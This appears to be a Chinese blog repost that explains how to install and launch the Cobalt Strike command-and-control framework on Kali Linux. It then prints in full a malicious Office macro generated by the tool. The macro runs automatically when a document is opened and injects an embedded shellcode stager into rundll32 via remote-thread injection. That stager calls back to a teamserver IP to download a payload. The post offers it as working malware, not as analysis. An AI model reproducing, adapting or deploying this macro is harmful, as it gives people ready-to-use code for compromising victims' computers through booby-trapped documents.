1. 首页
  2. 文章中心
  3. 工具

CobaltStrike 安装和使用环境搭建try it

107 阅读 0 评论
我是靠谱客的博主 天真秀发,这篇文章主要介绍CobaltStrike 安装和使用环境搭建try it,现在分享给大家,希望可以做个参考。

Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win.exe木马生成,win.dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等

环境搭建

我这里使用的是kali系统

下载jdk,我这下载的是jdk-8u281-linux-x64.tar.gz,https://www.oracle.com/java/technologies/javase/javase8u211-later-archive-downloads.html
或者更早版本:https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html

将jdk-8u281-linux-x64.tar.gz保存至/opt中,使用如下命令进行解压

复制代码
1
2
sudo tar -xzvf jdk-8u281-linux-x64.tar.gz

执行:vi ~/.bashrc,配置环境变量

复制代码
1
2
3
4
5
# install JAVA JDK
export JAVA_HOME=/opt/jdk1.8.0_281
export CLASSPATH=.:${JAVA_HOME}/lib
export PATH=${JAVA_HOME}/bin:$PATH

使配置生效,执行:

复制代码
1
2
source ~/.bashrc

更新

复制代码
1
2
3
4
5
update-alternatives --install /usr/bin/java java /opt/jdk1.8.0_281/bin/java 1
update-alternatives --install /usr/bin/javac javac /opt/jdk1.8.0_281/bin/javac 1
update-alternatives --set java /opt/jdk1.8.0_281/bin/java
update-alternatives --set javac /opt/jdk1.8.0_281/bin/javac

验证

复制代码
1
2
3
update-alternatives --config java
update-alternatives --config javac

下载CobaltStrike

说明:
· agscript:扩展应用的脚本
· c2lint:用于检查profile的错误和异常
· teamserver:服务器端启动程序
· cobaltstrike.jar:CobaltStrike核心程序
· cobaltstrike.auth:用于客户端和服务器端认证的文件,客户端和服务端有一个一模一样的
· cobaltstrike.store:秘钥证书存放文件

一些目录作用如下:

· data:用于保存当前TeamServer的一些数据
· download:用于存放在目标机器下载的数据
· upload:上传文件的目录
· logs:日志文件,包括Web日志、Beacon日志、截图日志、下载日志、键盘记录日志等
· third-party:第三方工具目录

try it

启动服务端:

复制代码
1
2
3
4
5
6
7
# 赋权
chmod +x teamserver
# 10.211.55.5是kali的ip地址,5wimming是密码
./teamserver 10.211.55.5 5wimming 
# 后台运行
nohup ./teamserver 10.211.55.5 5wimming &

在这里插入图片描述
启动客户端

复制代码
1
2
3
4
5
# 赋权
chmod +x cobaltstrike
# 运行
sudo ./cobaltstrike

在这里插入图片描述
连接启动
在这里插入图片描述
主要功能如下:
在这里插入图片描述
比如可以生成一个恶意的offic宏
在这里插入图片描述
在这里插入图片描述
下面生成的恶意宏

复制代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

#If VBA7 Then
    Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
    Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
    Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
    Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
    Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
    Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If

Sub Auto_Open()
    Dim myByte As Long, myArray As Variant, offset As Long
    Dim pInfo As PROCESS_INFORMATION
    Dim sInfo As STARTUPINFO
    Dim sNull As String
    Dim sProc As String

#If VBA7 Then
    Dim rwxpage As LongPtr, res As LongPtr
#Else
    Dim rwxpage As Long, res As Long
#End If
    myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1,49,-64,-84,60,97,124,2,44,32,-63,-49, _
13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1,-48,80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1, _
-42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3,125,-8,59,125,36,117,-30,88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4, _
-117,1,-48,-119,68,36,36,91,91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _
-43,49,-1,87,87,87,87,87,104,58,86,121,-89,-1,-43,-23,-124,0,0,0,91,49,-55,81,81,106,3,81,81,104,92,17,0,0,83,80,104,87,-119,-97, _
-58,-1,-43,-21,112,91,49,-46,82,104,0,2,64,-124,82,82,82,83,82,80,104,-21,85,46,59,-1,-43,-119,-58,-125,-61,80,49,-1,87,87,106,-1,83,86, _
104,45,6,24,123,-1,-43,-123,-64,15,-124,-61,1,0,0,49,-1,-123,-10,116,4,-119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119,-63,104,69,33,94,49,-1, _
-43,49,-1,87,106,7,81,86,80,104,-73,87,-32,11,-1,-43,-65,0,47,0,0,57,-57,116,-73,49,-1,-23,-111,1,0,0,-23,-55,1,0,0,-24,-117,-1, _
-1,-1,47,108,75,68,97,0,53,79,33,80,37,64,65,80,91,52,92,80,90,88,53,52,40,80,94,41,55,67,67,41,55,125,36,69,73,67,65,82, _
45,83,84,65,78,68,65,82,68,45,65,78,84,73,86,73,82,85,83,45,84,69,83,84,45,70,73,76,69,33,36,72,43,72,42,0,53,79,33,80, _
37,0,85,115,101,114,45,65,103,101,110,116,58,32,77,111,122,105,108,108,97,47,53,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77, _
83,73,69,32,57,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,49,59,32,87,79,87,54,52,59,32,84,114,105,100,101,110,116,47, _
53,46,48,59,32,66,79,73,69,57,59,69,78,85,83,41,13,10,0,53,79,33,80,37,64,65,80,91,52,92,80,90,88,53,52,40,80,94,41,55, _
67,67,41,55,125,36,69,73,67,65,82,45,83,84,65,78,68,65,82,68,45,65,78,84,73,86,73,82,85,83,45,84,69,83,84,45,70,73,76,69, _
33,36,72,43,72,42,0,53,79,33,80,37,64,65,80,91,52,92,80,90,88,53,52,40,80,94,41,55,67,67,41,55,125,36,69,73,67,65,82,45, _
83,84,65,78,68,65,82,68,45,65,78,84,73,86,73,82,85,83,45,84,69,83,84,45,70,73,76,69,33,36,72,43,72,42,0,53,79,33,80,37, _
64,65,80,91,52,92,80,90,88,53,52,40,80,94,41,55,67,67,41,55,125,36,69,73,67,65,82,45,83,84,65,78,68,65,82,68,45,65,78,84, _
73,86,73,82,85,83,45,84,69,83,84,45,70,73,76,69,33,36,72,43,72,42,0,53,79,0,104,-16,-75,-94,86,-1,-43,106,64,104,0,16,0,0, _
104,0,0,64,0,87,104,88,-92,83,-27,-1,-43,-109,-71,0,0,0,0,1,-39,81,83,-119,-25,87,104,0,32,0,0,83,86,104,18,-106,-119,-30,-1,-43, _
-123,-64,116,-58,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,-87,-3,-1,-1,49,48,46,50,49,49,46,53,53,46,53,0,0,0,0,0)
    If Len(Environ("ProgramW6432")) > 0 Then
        sProc = Environ("windir") & "\SysWOW64\rundll32.exe"
    Else
        sProc = Environ("windir") & "\System32\rundll32.exe"
    End If

    res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)

    rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
    For offset = LBound(myArray) To UBound(myArray)
        myByte = myArray(offset)
        res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
    Next offset
    res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub

当然cs功能非常强大,具体适用参考下面链接:https://www.anquanke.com/post/id/235251

最后

以上就是天真秀发最近收集整理的关于CobaltStrike 安装和使用环境搭建try it的全部内容,更多相关CobaltStrike内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(71)

相关文章

容器监控—阿里云&容器内部服务监控
容器监控—阿里云&容器内部服务监控
[阿里云-001] 阿里云容器服务 快速入门
[阿里云-001] 阿里云容器服务 快速入门
Cobalt Strike 4.2安装配置笔记(Client:M1芯片MacBook )(Server:CentOS7 )1 Mac端(Client)2 CentOS7端(Server)3 连接附:Centos7开放及查看端口命令
Cobalt Strike 4.2安装配置笔记(Client:M1芯片MacBook )(Server:CentOS7 )1 Mac端(Client)2 CentOS7端(Server)3 连接附:Centos7开放及查看端口命令
GoPhish钓鱼邮件开始设置钓鱼邮件各项配置
GoPhish钓鱼邮件开始设置钓鱼邮件各项配置
CobaltStrike 安装和使用环境搭建try it
CobaltStrike 安装和使用环境搭建try it
Gophish使用指南
Gophish使用指南
内网渗透神器-cobaltstrike的安装使用以及折腾踩坑填坑记录内网渗透神器-cobaltstrike的安装使用以及折腾踩坑填坑记录一、Cobalt Strike是什么?二、安装部署三、填坑记录总结
内网渗透神器-cobaltstrike的安装使用以及折腾踩坑填坑记录内网渗透神器-cobaltstrike的安装使用以及折腾踩坑填坑记录一、Cobalt Strike是什么?二、安装部署三、填坑记录总结
eml邮件导入outlook中_几个好用的邮件伪造工具
eml邮件导入outlook中_几个好用的邮件伪造工具

评论列表共有 0 条评论

立即
投稿
返回
顶部